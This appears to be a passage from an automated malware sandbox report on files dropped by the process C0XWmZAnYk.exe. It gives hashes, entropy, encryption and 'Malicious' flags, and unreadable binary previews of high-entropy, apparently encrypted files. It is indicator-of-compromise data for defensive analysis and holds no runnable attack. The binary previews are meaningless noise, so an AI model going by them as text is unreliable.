              Preview:{. ".E.K...u.f..q`4.M'.....<.1@?.r.....>...B..f7{.L....a..1k+X..7..sY.u...r...IPe...>.-.q'4./0ow.DD\_..kF......6........(M^a.E...Y......'Z.....J...bb.v...I...(...P.".2..%.k..:h.A......(.2.rbge....K... T...Q.}...A....._.si.m...Y..n..DN..li.m.....k.h.CDl\......,:<..n.x..:k.....:..'.J.WF..Qv....(LT0..7.w..s.}...]=....f.......S.$9H#.O...S....L.c.Q.....I....59.....^...E...b]..w.+.x.r...._..A.l....\^GDf.bl4j.13.... 7.....^R.......[...&Oi..k....]udC.7...V=.d..H..C.*."G...o..rj~....Ym.,W.[.`......f^.a..#7..;cu..\..9}.+....2..R.U...@..1.>.]........_..(....."...2.....^K^....RH...MO.M./.V5..c...=.D,<.s....I..H....C7.....D..f..F....^.X..t(..@..#..h.).B.X....&L.....^.s....y.<./....E...2....B...?..3.A..=f.=r._.J.'.u ...L.8. `_......N:.E|_..%.......{....1.......T..j...' ..M..hl..b.f..|*......B.*e..2..%+.yh.`6...L..H....u3....8B......RN.E).P.yO.r....&,.Pj...t......J;.v....D.......-8....!..y..dMZ1.. .M..n.O..1....$.s=..%..j..x.X...........m9.b.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):15903
              Entropy (8bit):7.990425011904957
              Encrypted:true
              SSDEEP:384:Yv6Ln6qC1KXXHAvSA+k0j4MEaMMUGuPWCu4UttXgrjC6Y:PJHqSA50jVEaMJHuCYXgaH
              MD5:E2C35B73DB5E2EF2F48B020EF40AAC55
              SHA1:1C1F09D088B3F30584A54ECD1785127B2F3BB519
              SHA-256:8FBBBF74E0D066BB8FFDCCF6C27162E4091B4B49CE3BB5B8125ECA9FB2D8FEDE
              SHA-512:7220664E20BB6C64605C751C1D3F63DD987C2B9F45B2587D8F8C21150A7362B4C79F7B712C9A52AE50258BBF90CA4FC5F127710506B1150B2E40A3F065D25CEA
              Malicious:true
              Preview:{. ".....^...Q<B..2......* .e.g...K.?ZX..lz...I{D.[..y.Z~.._.....I...m.`T..A.kr.......v.`..6$........'.z.jz!.....R.=M..Z..Q..l.V...2.4. ...-...@...P|*.._..:..*..6.O..L..'..O.v.....xO...kbW....F.......3.*o..U...r&d...b.WX......T.swr..p_..B.7E......"..8...2,.|.b,d..e.0v.}e.NVMN2..6hO.5G..(.....$d.I\..F...+.......s=.s6<..W5C...H....#.,.1......0vj..|p...5?c....f..~g.....Q\.+.P..D...d....15..{.E43.........L$7._.C..0.^.&........v.n.+.E..T.9..AT.6.;..W..3p.....q ....^.,.O..Apy.F.r..8;J\....\|f..".[.r...</..C.X....(G...@.......u.v.n#?.#.0G.j.:"_..4.(.XH.\p..<T`>.W6..k.O....O.fU.....Ni..........xT.]b0..U..!.8);ol..,.9..L*. ...B.~.6.WI.%...v.......H...... ...."$../.T.^.SI......b...(<p_>v.rm.*(*..9..<!..)4Kc.SG..%..2....S..&Xs84..T..S. .%R2......k;O.YCM.9Q|...$.4WGH].{...D.....C.e...2.D..JI.8.q..X.{.....=/...L'..*W.N.=y......./.(@T.j...q.Z.-.......c.".M...0)..W.V....6..B.5 ..o.X.@.C......A.r..,u....R.j[..Nkd.......m..7ZUX+~8-.h7[P.=..y.1.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):15895
              Entropy (8bit):7.988564609139155
              Encrypted:false
              SSDEEP:384:jJHZERbZiBd2dlKmRizRrWldl2Qmw0NLlV/eEpaeq:N5ER9iBdYhCrO32IALf9Vq
              MD5:8E0A57A46DB50DDCA3684DC9133BD3DC
              SHA1:CE44549EF1E514B85B2ECDC31BFEB61C2D13A0A9
              SHA-256:37707DFEAB3083CEA5EFE24F53C731B7925CC5035F88912AD54981BDD341AF52
              SHA-512:FBFA2D19C49FB39EFDE587A5A8102E8B725DA15EFBC1F64DD22A3D3ABEA90D28768115286F4340A44C098746607E5E28738C38739A3FF658B7836044164F3917
              Malicious:false
              Preview:{. "...Q].hW......@A..Li..*q...K$._.6.7...x.;.B....#n.J..!.U..Z..w..*..+-AH.:gu.f.6..m.zQ.....P.....J.*...C.$."...(..He.w.t.'rX=Z..HS..>T..a........\L.+...*..1;.).mB.|.d...U.z.J.......h....i.?.g]e...O $...../...1....3u@.v...-....iC4...Y;~8c .F.t..z.Q.zN#...`.=.F.#.M.y....3.F..!]H..Cz......|.."..........mo.`q.4..u..O...~Z4m..H.#.......&.R.a.<..V.&q.L....la..K...%.}...k...^._d*(...tU,..U.S.x..<l....@..B3F..s.3.yY.I..t.x+d...I2.. OO...?......L}....w.SP...U.G.{r.$.......3...v4...?.f..4..Z.X&.n...x.).1.Q9....r.K]...../..N..Xh5..>..v../(g#.....9..n...F.p.q..@.g.=-...*..M..."..........`dJ..".W.%......'.....6......1...(..]Kg.a..].Z./P..f.0.ap....n...Pwce......__.@rAG...]..._.kl.,.Wd....`3g.>.._.........Z.{...e..c..*!+....k'...........r{..O.|.N.i.........|.D?.M..?..P...}..8.=.c.1..6.l%..1.z......7...-+.._...y..'<..>>...#~(.&.2......H.....d.g[.v........u;/.~...Tkl.6.|.8p..]..SO.x.[,`x.x....|..;..K........Xw......u%....Z4..<..^...$x
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14493
              Entropy (8bit):7.98804965928185
              Encrypted:false
              SSDEEP:384:UDm6E6myFc4nFMwXq2ZS1sSFA0KO+bDSB:qAtya4nFPHSFCOWDm
              MD5:7D66C42A20112061FEE4C50B9D641CDA
              SHA1:3F27EB3619913C16655B37B0D5412C0C1F698473
              SHA-256:68E1FFF8FF3EBEDDA7153BE3ED426CF9164F6C0A076ECC0ED6FABB6C19E5B784
              SHA-512:FA778D25FC0EE29DF411DBE944DB655925E810C26319ADABDBB9ED989201E7FCDC0A83FE19C3ABAD8FCC3892966F9CD07A2941F608D79E2B5DEC310E85F32A22
              Malicious:false
              Preview:{. "N.0=.qZv.1.wv..qIZ.g.]2T1.....L..0.......\..w...f\.'..b#..TX.7TC........8P..z......a....TG#....01.n;..K..q_/.....9......Y.|.......x)oS...e...M.....+.<..9zm.V{M....W...;..q.fka.....L.....o7..R<...S.....q...l...`so:.E.#..].O1.i.......d.s-...l^...T.G..HK.U....Dl.<C...C.t....-..Oj..a.MCd.R.Eu........2/.3{.. .s{.=[..B.......l.......31.3."r.o.........R.....#...y.H../..c+z3.Od...6.w....<.&.....k....N&uhL......k......U.~...{......:e.[..u...7..z.@H/....Q....=.m*G.. ./....F...|.G...u..,.J:.(.a9..|..W*r.............Wp..3...5i.AtH...C......&......#..."...N..t|..Q.k.c%.....I......r.l(.P...k.C....1b.>#.qv....mU`.....}.q.e9....Q.._.vbs.r.(.C.?6..~.M.s...sl...I:SG3..OC.7....9..a...B+..7....}..{...x..-..D1..La.74.G.8.W.g....&..-...Cn..g$...r.....S..W...%h.......lF.....VT.PQ..'.).....\......!...n...Y+"em....X.U]?.....u..3.7.....R..T.....~.|H...5..5..........*..=...pT..>Z...../..B......3..vNc-...........=....A...........8...%.cn
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14927
              Entropy (8bit):7.989763852433139
              Encrypted:false
              SSDEEP:384:/oBLZnzK2IiOdbunQDa3zJrLwpx7f2iGfF2pfHaoUQ00uH2W:QnzKTunQDizNspx7Oz92xH722W
              MD5:1A321C5D5DA5B16A649D54EF71FE16E7
              SHA1:CC7DAE57136FED98F4CF05FF2478071AA233C069
              SHA-256:1B70F8244B6141D2D08F1BEFF9758F28194423E2476348A43E1D85A5B763B6B9
              SHA-512:972333F51CC4EE0856F76A0FE45FD3211E70BE0FDCD8255AE02E6690E0FECAC78F6CA0140576F1A0B5F1685051C9CAA116C78FAF591624D62E7BB6095EB7AAEF
              Malicious:false
              Preview:{. ".lN..N.i..P.o..dV.L..N....d.i.l(..P......A.\.f.^hC..h"....`.v.K0...=?..9*..i?...........}%./...7.A.....D....|..*.^T{W..BA. P.._ .];.^.V.<..N.bu5.-O>.2..>.Cac.....Z. ../S6+..4.`..].._[...'bT.e...D)..."#.z...@[.eh5..J.Rs........?....|.P..d..P.s.......".f.......zQ....x.+K."x...P...w...Y..:........o....B.+...O_.j......t.<...h.u...Z.9...G.{....@0FB...<..q.>.^......"M..[`.b...90..'..MV..g..svM\n.b.3.2}.lF.d...W%..yE.....k$.kv...P..}....m..@ ....\.g{Eb....=~..W.....z..:./].T...+......;. /2....^....MfH:~..}...g1..............)s.....c.L...a?.X4..`.# .z....@...8:r...d".....]........`E.r...j.tZa.\x^..(..}.;=.;..Ui..U(...5T...3.LmH)...@}/#...............2j.r.Zm.W!^`7........E{)..n..+.....4.....1...Vh........Y.......8..;.r.-.-Y..i........2...1.G_...vU%5\Y.q<q.H...f.~..h..{...'.sYJ.....+.....}.d....Tg...S.R....#.w!.Kv.z.j........o>..Rc..U...N..c.Q.|..EYq2h.%E.U...oQ.6ZH.w\$...._.DQ..t...s......q$..F..........nX....4..!..m...X.U..*...k.qp[...e.X4.SD
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):17211
              Entropy (8bit):7.988997170880094
              Encrypted:false
              SSDEEP:384:OXdXN7uroQI/1t34cqvcAHttvZnv8dslIbmnv0JZnW+Fh:WXNmoQmHoKAEsvv0JZnW+/
              MD5:1F9FE4566F209DE4F59E0F690FF850DF
              SHA1:C10F5F4A619FBC9CDDCBE358B64BD8CDBD937C7C
              SHA-256:EFB610B7415710A42FC6115E6B651993EDD6216072121C12C2F5BD9A7A6B9827
              SHA-512:29426AE0EE711D27DA91202363F3F9ABE9207059DF88EF555B2181E339859D752FA33E6D6680A6CB8750F22702909E1B868497E973309B9587B4321E96CBFC96
              Malicious:false
              Preview:{. "KQ......j]uS.J..,...])t...p..0...2....+.... .>.......~....+m.7O/.G...E...X.~DB...~9.B....Q.u.OA.9.d?e8.@)..wn.\........z..Q...Bv......._M.8PJ..6$.4..U.T.'}L..!..`.=...8\..r.2%D......Or.X.O.v..AV...........hK.z..d........ FG@.0.w.M0..O.....,X7q....a,o2f.....^...rnu5..G..M>.f....j...b..zp..3.....Wq..CAzg..Uz.ir_He.BA.....u....FI.x..* .Y.(..>.yyPA.-.^..h."0..CxH0.^..-.\.o..N.-......x...\}..}.ah....b....\mQT.a.. 7...=...?...R~=K..@A...L\....dt>.Y.TW.E+t./0....Lh.........u.<V\7.J.E...@5....#:.J.^;........Y.k....z;!.,.....{....FGm{.U.?.1..E...5".YK.b.;...[f^.~|.L.zs.1zR.@.&.....<.qQ.v..j.cJ^./D......`r-6.Q.wm...Q...Dq..I5....7.nfz.5T...v...){.4...R.....-.....\C..S.6.m.B...E.(...~3....k.0B....R...?Bi....J..|..Z..6..A....0..r.....`.+..H..6'...Q._.BDT.. .F....D..(../.z...J.m>.Z..-.h.d.~(....+....S.*....l.........mi .T..n...|Y.MbvTa......8j-.k....o..W...!S.........Y...N.....uvf@,..0.z.y..k..J..mwg.....u............JT......+.......S......C.z.k!..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14786
              Entropy (8bit):7.985565413585485
              Encrypted:false
              SSDEEP:384:BQRS2c3CZ8WrGOJPiPlcmOEasmuoWJ6OAOmTkES7S+owL57S/YP:BQc2cG8WrGOJPi9CuoxOAOmTkh7S/Cd
              MD5:BF4089C433A03D0CF813982B0379CF0F
              SHA1:0FCD811DA252B01558D3890AFC676F257AA2436E
              SHA-256:030F027E7C19CD7D87F9857C2907043CB819CCC198FD8455FFEBA1B6C47DF55D
              SHA-512:8CA730C9429D0C9CC466C90D525049E3B11CB9D17AFBCF66F583C86AC068013939CB1129095B985488E907689085903121573B4BB3E24F23C01D1E90BBE6A4F9
              Malicious:false
              Preview:{. "....a...*...r.q.T.);[..I..A......M....$6..c.........X.P.".1...i\.e.Ex..[8..A,b.F.\n../B.#....@..>.5........{...&.(X.....+.......*.....$...z.U...T};.W..qt-..X.w.=c...g....R.r...yG...\V.u...?.az.2.8P.....d#|=_bk..&..o..u.4.t.......u....y.$v.^.. .WN..v...Z...O...oG.=)...GE...Z.j.O.%s1.a...T..,.......d.cT.}T..a.....6.`.[..-...%......$\.&3...\..`..IXg....:m$5(..Y..H.ci@...i...pb-r.[.......h..WE.LHY+=...Qz.....o....l.g1:..zq.3:Z.|..U?..5O.%.,.ar{...o.. cp"..>\.n.<...}.^..r..].K...8..~.-.ar'[.n.x.x.*X.....@HH....?..A(.H0.b.&U.C..(.-.E..t..e....2(N....j(...k..l...x.71.1..).-b.y*.V...7.......X{.n....F.YM......h......W...d..@.:...;/..i6p}....o.?}y...'O.F...C.6..H.p.p.4...I...b..r....CeE.C..6......Q..\A...u..'...j....y}.*.&;....*.DhM...l...T......b.j..0.......~W!.4.2%..x...~..R....(.EF.Au....'...g../).....t'..sm....?.iL.WH4.Q...R.#..M.dsV...;&&...q~}Y....7.g.6.W+.F#.y.{?q._..%.=./..0...O.M21<.u..Il..........D...........
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14769
              Entropy (8bit):7.987744477030389
              Encrypted:false
              SSDEEP:384:1ITPbM5yJz9ZBeSdPqZNgV52uDhiiuKc1dzUARqLXZ:1IUS9ZESFqTgVDoiuUA47Z
              MD5:EDCAAF3C95BEF75CC6346238FF5100FF
              SHA1:9523A7B11803756503E2B8615C04E75767DE704B
              SHA-256:95E146325B1FE6D14F7C924BB0A23570B66461E52AB5DCA49B5F11593DAA31C6
              SHA-512:691222ECB9242351AD04312342C5FD5B029C1B604AD0A9F493B7FA121658C960E5676274AA52E33F91254614F2382AB3D7C1A207D5E199683B5D5A7DCA397819
              Malicious:false
              Preview:{. "d0....Nrb.j.0.1p.S......._..5./^2M.9,.@"n.z...2.~.....D.Y*..._E...........|.^...+...r..A&...O.T..#VxA.D.&...1..g..&..^./..7.*..A7.c....Hnw..t.{K.GD....]I...k..B.$..Ll.v......2V..+.3V.....A.p.U..q...B.P.[.K.f..`.3..$.f.B.:....[.fo.mL.0.:.,R....y.G..<V.......Y)........-..4A.....j..g.1..U.m....5.e~..g.mU%.}..4@..........e|.;2...9L.}+...O....L@ws...0.........D...S..rq..#<k,.........Wg.l\....;ZBm.p.Kw$.?...?)P_....@..U .4.x]fF.......'.......aw... ......,.;._wN.W..=+...o.Vj.P.B....Dl..!Pa..K.?;.P.iz./17%....4......Xe.p...x...xX................_..O8.PE."..z.Y%.."..c..L.:.G...c...-...+.vO......W.e..y...$>K....@...5T.|.I.)6.8.A.3.AM..O..P.V..Rk.....C.<..P.+.9.'R...`...d.Qh...c.;...O...4W>..R.!.2.-..g.O.7..+R.....b....l.n..`......3...I..TS..x...&.T.b..P...l_..FE...1C7.....@...X.....U..V.B..R.........A|...Z.o..}v..z.b.....#...2.A7.^i..>....'...;.A........<..m^........Si......w_5g.D.z.C...+}&.J... [........)..N..t.x..iG.h..A..".u.C.!4\@..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14956
              Entropy (8bit):7.9864510252660565
              Encrypted:false
              SSDEEP:384:cE2zn/j+bzZfTGDyq1eDe6KybpwkCSpboiLJCzIhUttc3p0DySKnV5n3D:cE4n/j+BIyqoeDvSpUiLJCPcuynXn3D
              MD5:62DC3E598BB68F2F14C1F817CFF93A08
              SHA1:92D1FCA91407024B98549ABD3C497C10512C1530
              SHA-256:75F42B1A2FACA72D215704891F91D93DD2397D532D9F167044297EAA1FC3C879
              SHA-512:2C9BC8ABCB7F651F267127AC8F9BE060AF8C546B3577B156917595028E71F3DC950C597E210BB8B890C8204456AE698E0F618F883FCA4F3CA87058B980DFF8CD
              Malicious:false
              Preview:{. "B.../4.S*C.,...R..duC...,...$.....O.l.v-pw.X@.X./...,..7..i.....c...;.....!Z.....O.W....2.W..B......O}}....oR3#U..I6hT.yy..v...C1. F.....o....F..r.^f&..{..4..;...$.6.k..<..*.B3.nc.F,x.....Ig....[8...[..r.........w...8..N]..p.p....b......h)$4.fs..@.y....YtH..'..$.IS~...~..U.F..f..i3Z....r...#..M.{r..%.0.........5\.G..a..~p....&8[.(..#..mO..o.Hx..<........k...fa5.?..at..).'5?e.y.@.x...ehP.O.dl.F........v..wO.9.......0ts...Q.m.i.[.V.#W... S..........J..:f.D.-...,..j.Af\._3...r.....QU.....b.........2!.1.G...D.......A_i/x._..o.e/H...7b.H.?|.O......_.]U.YhvQ]%....:.'&&.....`~.ux......8..*..e!$...PNd.,.Z7#....Fu.I...;P..~....B:.[......4.b.4.n..W.[.SM.s..TJZ..r..%rt^V]..ere.[0...Ob..R./V.K.........L\.<..Qc$....95...e..6.."'.'y..+.C..J...#K:.Z...07)....NG.......23.....p'..>....T..h......."...t..3.k8$$..ZI.<..r&Lv.......zi..E-..`z....a..........6..y...}j.5%..s.NS.\.#.Fo.g....=.R..QK\e.tJ...`:..e.H.........)...G..K....Xm{o[.M.pDq.L.R.;.=@.(.F
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):20815
              Entropy (8bit):7.990264332798797
              Encrypted:true
              SSDEEP:384:zNANfkv/rpRASozuYwiEW89DJamsec2cSfhLeVEy4Jr:ZCfIDpySuuYbEHyro4E1Jr
              MD5:C1293AF699B65ED25D498953449698C9
              SHA1:A767C021D6DE43F10C9BFA92C6F24DEA2C9A61D4
              SHA-256:DE65CEF5A042A21A6C792E579DC4C82114A05321048C1E82F5B226EECB3427C4
              SHA-512:BE4BE93EB2902986774295DF6BBE51ADB050508E0BE3A22649D7819B88FF890A893B01C75694D50F45E64EA1830A053B5BD869DCE04DD2BCAD2E9E01D40AFC3A
              Malicious:true
              Preview:{. "........(.6L.........;..g..2."{?r...:.w..RAu.#.K...<{.....m.7 ..SV.t.?t#.oo.n..."8..x. ..Lke!..#..Y...t-..~.. ........]p......N...q...L..._.E.....m.l.[....e*!"x(.H.Ck.....Q{.L.....`.nt.t.z..[.4..[...iv....pl.X...a...A.PWp."....7..a~......,...T..3..l...k..J#...E.T.....8..}.J.Gi>.F..|.T.$.o.S....{.a....g.......g....r.g...CUkd..Y...a...e..T....jZ.B.cY._l..m....1.O"....%......J..?v....f.....`..a...n_[(.7m. .$.guQ.....C..,U<....Z..l....k.;....1eV.~M-E..,.Q..D.x..7..8o...B...IH.f.4..........;...k.....r.S..c.s/.+.F.o.........w.j.K.Q.J/`.2o.....6{n......].@.......T.HT....Y./....C.e.ohkQ\.C.L#..c.;.,"!.z......B....Y./..E...].. sO.t:..b....aLO.....?...0.W.f.t..,..`.U..@...Lb./....`.H.*.....#.e..E....e..[.iv....u.%....-@+r.G.]|4.D....1....B...`.*.}A..<......4....)gd.6..s..A.4..Q(.)....\..9W?4..0l.%.L...v.!...1@aNG.[...j2.....X.|.4U...v....`.Z..o.4....d...k.^..g...c.....`..r.46.@.)...2..!N...i.wG$....uhj...n.x:...b...K..w...<Y..h...a.c
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14512
              Entropy (8bit):7.988632245294115
              Encrypted:false
              SSDEEP:384:VVZCVE8ZOOyomyLeWiv7zFuMeWUmfOgjM1Zj/Q:VVZCTnLe5jpuMvUESr0
              MD5:FE94326E5F358FD381D52D0325E5BE4F
              SHA1:C42422B07B54B48620B7B00AAAB05F835C94883E
              SHA-256:E2567097789FFFE70E2853B5DC1FF7A5E5F3AFA2E35AEB6B41BF586049B9D82D
              SHA-512:7039A34CC485FAC554EE5A3F328D9DB78DEBA716076F5D54E86620455A108AC9CC39511937BAB760509AECCDE0F7A288CBAF0F7C9C74C8DBF6BF425CC5FA956E
              Malicious:false
              Preview:{. "A.$.& q.y..H......."..qPN..m..GU......7.'m..V."......BQ..a..(.]....1.]>.$ ={.(.=xKmI.b..T..!..kE........M..u."~..........h...S......p....L8..F..#.ub.A..P..@.@.+......_&......3.....7..S.+._.8.&.K......L.......}C....,L..0.t.a.cB..R.n~....;|F...Y5..)..........5.<J[........u..C.is|.O)...-o......V.i+...........[...4..o...m2.....*.k.u.[Nx...D..g....5.T5 .+@.Wi....mq....@PL+.4...........5M........C....g..L2m..Fa$..+9....{.`.0.B..s..b......Duq.t.S...}..{?.d..b.A ..M....!.l.k1....WJ....3-!.....5..?.n(._2z(..w..$P.{.R.e.!R....45.......S.K&..y..u..<y$.\.......8....I.GS.".....T....._&.../.E../9e\.Y..ow.!N.g...Cu.X/.Gd..3....].]..-....c.Uz<+8...m8....."..W.....?v....Fw0...>..-.......up...v>9......7 .x2#*>.... ......:.+)nR....N.....Br.N....*..uKX..}.DZ5 L..a..$..IY.L...E.C...."...x.h....../.........h.......$........Q.._.ev..Gm9.8.....>..OQr.......l..e..Uu.."....#.G.-&.-..(.o..z...%7*..n..W..GR....D9.#}...d|.4....>*.&..zq..{7.}b+..9g.-.B.B....ndM.k.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):13208
              Entropy (8bit):7.982940066375354
              Encrypted:false
              SSDEEP:384:Dna/roHfAKm0OphDJhE9Ufh+iud6iu5Vfz0GYS:DnMhE9U3udKDIG3
              MD5:836D3D3CD62EE4D950E7F2F83C1284AF
              SHA1:50C3DD35AD0EF14D23D825A07935B9515FF78ED3
              SHA-256:3BA343C49A9B804E0E9DE117D5BBB2F01BD915B10298312674E832C40B0448CA
              SHA-512:B8F768D83C2F6ABDE2A8CF60826B06F172D8F78A0CB34F647A3537F2FB5DB6CEB2F4117C395306F6B593D0867E313E2C816FA3ED4632E0BDEE99D9512949111F
              Malicious:false
              Preview:{. "..L"L...o....n....Ty..0~..].."...di...%....Sl..X)\..U..o.Q.e/5....;.......2..W.F....k..B.@.?....:I.3..W..{...wt.1...?..3@.f...8w.......vC..>....Eq.).(.up@........j.x...*A.......>;7.,.z|..E.. .*.a....z.........mR.vu..xCh(..F....w...9.....>..i..........7..c.4P..Y.J.P....6.=...k...!h.*|..Tt..C......XM.O.,!.]....[P..q!....%\..@...}Ac...7S..%@........x.{$...0w..hu.-.......h`__w.......Y......%.t..7CA...%..^.....6.:.p.j.H.T..... ..'.....*.._......~...C*...............Y|.....`|..h..;..;...RA.'..U..VNU.[..w.....9..dj...=.B...:4I...7u.(......v..o.IN.,F.. s..9..........A*...E"..{......u.......n.....V$.......M.F...nN?...RH.T.N.......-.[..h..<...|..,...........*a=:...=.T.~...{.I..W..x....x.Z5.,..H...yx.e.%O...!......U.V.qJ.RBY..o.....m.wc...!.{...y....|.....e.......x..!...tw2...P......lTV.l.7....tO2u...-..9F...-v.DF.t<.It.1b...}...O.N)f.W.]....H3.n.3.0k.x..*v|...z..Y`l......-$..c......d.\....24...eg...e.h.(b4....=.v.a...7V..=
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):13663
              Entropy (8bit):7.986257391524242
              Encrypted:false
              SSDEEP:384:6qdnntLu4wgf4UaIzxrsDLhBbhjfYSNOr:6qdn0hgf4ytI/tfYSc
              MD5:30C0C6C3C89F31930087113D9B33DAB4
              SHA1:8EA31B039CC6CDBDE888C1BA5BAE965A5EE24207
              SHA-256:1D00A745B2F69EE61E995F4EAB0372F228A4A677550C4315D65BC718592CFF0B
              SHA-512:087DE50133A2A3638D9813F2A71AAA4377CCD4CA39C8155350F4A689FCCE9377D7BC862451A4E0C31525F0A1B21D21FFCFF97573587C8E5F3C4FE92031C4F02D
              Malicious:false
              Preview:{. ".Kq..8...I.u.V........uN5l).3e.6X....2J.:..0m.x..;&.".g.&'..[s.Y....'t..........N...bk..i.+d..r.....'.....1+..C.....Vq('......@.=.s.................O..K]i~.3D>9Z8._...U..Y..z?d..x.lV.L.v...K4?........bQ.z...W_1"..(X..#.K....JJ...,R...]7p.- ."..v. +?...3,.."b;.0....~.3...#.H9.E7......`.........t.{....Y...O.P6<j.(b..x.{N....al5......L.._..lP..".'..<e.QY*........]U....k......FG...1n.......".l..5.[.w]o..OJ..Ohs...D.F...#.Go...^...:.L2.t[....cB;+=SJ..e.jg.PG|h...rl".....j.........=..._.q.l-.B....(}Y^.0G_..D....).....t...S..@Q....O.Q.....3.l>.$.....i..(F..,bFY..6.U..6q.wk..s....7.w..G..6th... .g...K{.j".*....5...}...23....>..Ar.....P .o.=..1M$7.u.V1.m?4.8W.T.o.@....A3Z.o.;.$.G1<...`..>.7....}.+...o......%...........ZO1.!.....p>...J.iJ.I......\...B..........q.w.W.S6..H{...q..O..5...k.....G.lNc.p...>q.gu#...O..M.3`..P..4R...k8A[Hh.9.E.W+w..d.j.T.....I.<..~....{6....@aM.H.......\.s..';.ax..&p/.h...*k...M..o.H.&5.4...x2.iV...H.........]-.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):73624
              Entropy (8bit):7.997658411276229
              Encrypted:true
              SSDEEP:1536:NTFAat8NQesn3y3USi310nwn8+d1uWsP3H/090Pc4vok:NTFAil10nwjd1HP+c6ok
              MD5:737BF145369D8F19B74B29BD5116C9B7
              SHA1:7B237EDE78275DB99D659BDE83997189F8F15E10
              SHA-256:97974BF08DFC5604C13564D6057AEB0EDAEC6BCF8C03EA3A8908F95403C63EAF
              SHA-512:AA107665A35C8019A8C442FD919F3A3121532C447875180F90CDB828AC18B973CB571BF2A1ADB8EA1C1CF501E9B053403643B047D3CF4D862F56852D07F9552F
              Malicious:true
              Preview:{. "..u...:.I.....VW.G...{.\....:.:...K..7j...-.......<.......i..(W.c..'..s.C.....=....Bi.h._.4j..E.0.j^2..^.0.z.@7...[.j1h...6........K_..l&..H0).n.Z:.1...Wi.~9*O.F.s..s....|.0...&(...OZ...<g{f.x..m....A..jaW.8t.N......1....s@.&&....5vj..[^.. K...B).{v...u.BH..]`uI.b..........M.i.E.8....!E.x~./.w.*yv.../.....g%..wZ...&j..O...0..hjz......!.m~~...`..k.....m..?......r(P...rW..4%...B..w...+<!8..f..}..!.6.....W...u.X.y.p..[.....:.{.v.\...^.,|.......}.....|B!._.........X..6..y...l........(?W. ...{^..^.Q.../%.g.K>n....!..Nsn3....O.90j#.jN..-.E.|.M6Kz......y.T.K..bN..,..J..9..n.B2o$-yi..._;.=..E.g.W..*..<._.6.....5.,.3...b....FE.....D...e<7I Fl...{S.YT....w...........j....c.h...X..E.oBCMU.. ..7N.S...eJ.V43 .A...m..].Db.P8.......W.tR..\-..;.J.....D"[...*....6...2;....>{.M....w.K..).N..>...T.....$..1....N..Q\.X^.....t..m.V...~=X8...6..&.3.nz.t..k.......!.iu7.T.U,..?`u.........YS..{.1...p.....;....y.x...%Yz[.'yc4...>.6.Iz...v....... I.z).f...$G.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):63689
              Entropy (8bit):7.997133768352156
              Encrypted:true
              SSDEEP:1536:o91Z934+laEsViiDS8sYC6vEyeVHBY1Rgk5kw4:o91ZhaEsVi6S8CQKeQC4
              MD5:37931848DAAAFC4344A699510EFA4079
              SHA1:15C6A331F54250DF1E9528C1A5C126E61F21A7F8
              SHA-256:3481D574C3A5351CEDC51B1DC670D48CB8F020407852B79173A5016C77EE5317
              SHA-512:7456FAC79D8253ACC843587939819028E24E0EA95D8524AA4FA4ED0C106877D3B686B87D7C0C88430BC0E480571339084A8373F8F09EFBDE5F2C41D7BE2CD67C
              Malicious:true
              Preview:{. ".'P.=t).Q.()L...f.V..U.%..J3#.......O.......7~.O($57..T..d.... ..U.s..'2u6_..4..1U=p....ev.e...*...\..(x6.rz........%.<....Y(-........Z-..D.\z...j5s...u...7.&..00.......s.K..B..b...2....<...(;.....9.Q...l'..y;.-.b....k.H2n=..Op...t.Yq1....R.h=.R....I..^.F...|..8an...t..Y...w..B..$...O.#.yG#.?..G.B.J.e...+M.......c.u.......C...Z..]&.._....2....._.4=a..I.......8.........-.....E.w_..=V.o#.i..3.......rp...5..}.....c|;K9..N..?k......x.......VZ.6....B.4....,...nj...j.7t7!<......%.......f..:jt.(.3..*...%hU..3....u.=....z .D^.....w.p.q...j...H..B.W% ?..!n.I...V.]..T....u%._.]...[...Z....-.(w.gI....g..r.VY...M.....D...b..)...A..s,{...AJu..n.....!9.N.a.8..E.......r.(x...@...|......WK.......9.C.1.......oL<.]n. ..FC.......+.k....2r..}..y~..?*.... .@:....|.9..&.D.M..G4.._.QD.{|...C...=..[......gi.+C...1%.-..{..e-`..CM.V\.P..G.g.....v'.*.j.....r....."W.W&.......C|._c.5m.....t...O..Ih..v.>._,AY.i%.{.jf.u.....rQ...tP5...o...otEq.......]...B2.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):54912
              Entropy (8bit):7.996932281855265
              Encrypted:true
              SSDEEP:768:SxYEuvHUUe5dqAYLV8qXxwbrKW/6bP5ddYoALx+lRmRMBagGFXV/W7ospcHAhd:Sruv057qXxasdYog8RmPx/gosWHAf
              MD5:2B15C42DDAA5614E4460DA6076AB4BDF
              SHA1:C1A623086E503CBA707254B3650E5B13B54C0222
              SHA-256:B9B024413EA46FC0F623EAA56FAB616FE1474E58B035B3F2407ACB2B8046DC1C
              SHA-512:E6AE61B5EE0149FB799B23861265D01625FC1A503032648AB4883C93E183EA63ECBCD7BCF657A936172C2274E1C6060B0024EC50791AFCAECA82C6544FFC43EB
              Malicious:true
